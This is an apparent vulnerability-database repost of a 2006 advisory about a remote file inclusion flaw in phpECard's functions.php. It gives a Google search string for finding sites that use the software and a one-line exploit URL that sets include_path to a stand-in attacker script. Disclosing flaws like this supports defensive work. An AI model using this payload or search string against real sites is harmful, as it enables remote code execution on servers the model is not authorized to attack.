phpECard <= 2.1.4 (functions.php) Remote File Include Vulnerability

2014-07-01T00:00:00
ID SSV:63905
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #==============================================================================================
# phpECard (functions.php) Remote File Inclusion Exploit
#===============================================================================================
#                                                                          
#Critical Level : Dangerous                                                
#                                                                          
#Venedor site : http://www.quick-xs.net/phpecard/
#          
#Google Search: powered by: phpecard                                                                                                                          
#                                                             
#================================================================================================
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/functions.php?include_path=http://evil_script?
#
#
#================================================================================================
#Discoverd By : LeAk
#
#Conatact : Escape_LeAk[at]yahoo.com
#
# Turkis Hackers
==================================================================================================

# milw0rm.com [2006-08-29]